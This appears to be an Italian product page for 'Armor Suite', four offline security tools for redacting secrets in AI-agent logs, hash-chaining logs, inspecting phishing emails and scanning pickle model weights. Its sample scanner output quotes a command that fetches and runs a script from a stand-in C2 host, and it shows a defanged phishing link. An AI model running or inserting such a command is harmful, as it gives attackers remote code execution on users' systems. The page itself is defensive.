MC Project Lab MC Project Lab
Cyber Difesa Locale · Zero Cloud · Riservatezza Deterministica
LogArmor Logo Replay Logo MailArmor Logo WeightArmor Logo

Armor Suite

Quattro soluzioni indipendenti per la sicurezza locale di dati sensibili, registri storici, comunicazioni aziendali e pesi di modelli AI. Nessun dato inviato a server esterni, nessuna dipendenza da servizi cloud.

I 4 Pilastri di Sicurezza

Protezione al 100% Locale

  • LogArmor: Scansione, censura e mascheramento di chiavi API, IP ed email dai file di log prima della condivisione.
  • LogArmor Replay: Sigillatura crittografica (SHA-256) dei log per rendere verificabile nel tempo l'assenza di manomissioni.
  • MailArmor: Ispezione statica locale per file email .eml, verifica SPF/DKIM/DMARC e disinnesco link/allegati.
  • WeightArmor: Ispezione statica offline per checkpoint e modelli AI (Pickle, PyTorch, Safetensors) contro esecuzione arbitraria di codice (RCE).
  • Elaborazione interamente offline sul computer locale.
LogArmor Logo
Modulo 01 · Sanitizzazione Log

LogArmor

I log di sessione degli agenti AI (Cursor, Claude Code, Aider, script proprietari) contengono frequentemente chiavi API in chiaro (OpenAI, Gemini, Anthropic), token di autenticazione, IP ed email private. LogArmor individua questi pattern e li maschera con etichette leggibili.

  • Riconoscimento pattern credenziali per i principali provider AI
  • Mascheramento con etichette standard (es. [OPENAI_API_KEY], [IPV4_ADDRESS])
  • Opzione di distruzione e sovrascrittura sicura (shredding) su richiesta
ESEMPIO CENSURA LOG IN MEMORIA
[-] PRIMA:
"auth_header": "Bearer sk-proj-9A8b7c6D5e4F3g2H1jK..."
"remote_ip": "192.168.1.105",
"user_email": "direzione@azienda.it"

[+] DOPO CENSURA LOGARMOR:
"auth_header": "Bearer [OPENAI_API_KEY]"
"remote_ip": "[IPV4_ADDRESS]",
"user_email": "[EMAIL_ADDRESS]"
Replay Logo
Modulo 02 · Audit Trail Crittografico

LogArmor Replay

In caso di anomalie o per conformità normativa (AI Act), come dimostrare che il log di esecuzione di un agente non è stato modificato o ripulito a posteriori? Replay calcola una catena crittografica riga per riga: se un log viene alterato anche di un solo carattere, la firma fallisce indicando la riga esatta manomessa.

  • Catena di firme SHA-256 progressiva immodificabile
  • Rilevamento istantaneo di cancellazioni, aggiunte o modifiche riga per riga
  • Report probatorio utilizzabile in audit di conformità e sicurezza
VERIFICA INTEGRITÀ AUDIT TRAIL
Controllo catena: 142 righe verificate
Riga 001..087: ✓ INTEGRITÀ CONFERMATA (SHA-256)
Riga 088:      ✗ ANOMALIA: HASH NON CORRISPONDENTE
Dettaglio:     Il testo della riga 88 è stato modificato
Esito:         ALTERAZIONE POST-SESSIONE RILEVATA
MailArmor Logo
Modulo 03 · Ispezione Email & Phishing

MailArmor

Ispezione forense locale per file di posta (.eml). Permette al team IT e agli utenti di verificare email sospette prima di aprirle: controlla la provenienza reale (SPF, DKIM, DMARC), disinnesca automaticamente i link pericolosi (hxxps://) ed elenca gli allegati con le rispettive impronte SHA-256 senza mai eseguirli sul sistema.

  • Verifica allineamento mittente / Return-Path contro spoofing
  • Disinnesco automatico dei collegamenti web per prevenire click accidentali
  • Ispezione statica sicura degli allegati senza esecuzione né macro
REPORT FORENSE MAILARMOR (.EML)
Mittente:   comunicazioni@banca-sicura.it
Return-Path: attacker@fake-server.xyz [MISMATCH]
DMARC/SPF:  FAIL (Mittente non autorizzato)
Link trovati (2) disinnescati:
  - hxxps://login-fake-portal[.]xyz/reset
Allegati (1):
  - fattura_urgente.pdf.exe (SHA-256: 4f8a...)
Verdetto:   ALTO RISCHIO (Spoofing & Phishing)
WeightArmor Logo
Modulo 04 · Ispezione Pesi & Modelli AI

WeightArmor

Scanner statico offline per checkpoint e pesi di modelli AI (.pt, .pth, .bin, .pkl, .safetensors). Ispeziona il bytecode Pickle senza mai eseguire il file, intercettando chiamate dannose a comandi di sistema (os.system, subprocess, socket di rete) prima del caricamento nei framework di inferenza.

  • Simulazione stack Pickle senza esecuzione arbitraria di codice (RCE)
  • Zero dipendenze esterne: funziona in puro Python standard senza PyTorch o CUDA
  • Scansione ricorsiva di cartelle di modelli e verifica rapida header Safetensors
SCANSIONE MODELLO AI WEIGHTARMOR
Target:  ./models/checkpoint_epoch_12.pt (1.2 GB)
Formato: PyTorch / Pickle Protocol 4
Opcode:  GENOPS (stack simulation attiva)
Rilevamento globale pericoloso:
  - nt.system / posix.system [CRITICAL]
  - Argomento: 'curl -s https://c2.xyz/rev | bash'
Verdetto: [RISCHIO CRITICO] RCE / Reverse Shell rilevata
Azione:  File bloccato prima del caricamento in memoria

Proteggi i tuoi processi con la Armor Suite

Tutti i moduli della linea Armor operano al 100% in locale e in autonomia, garantendo la totale riservatezza industriale dei tuoi dati.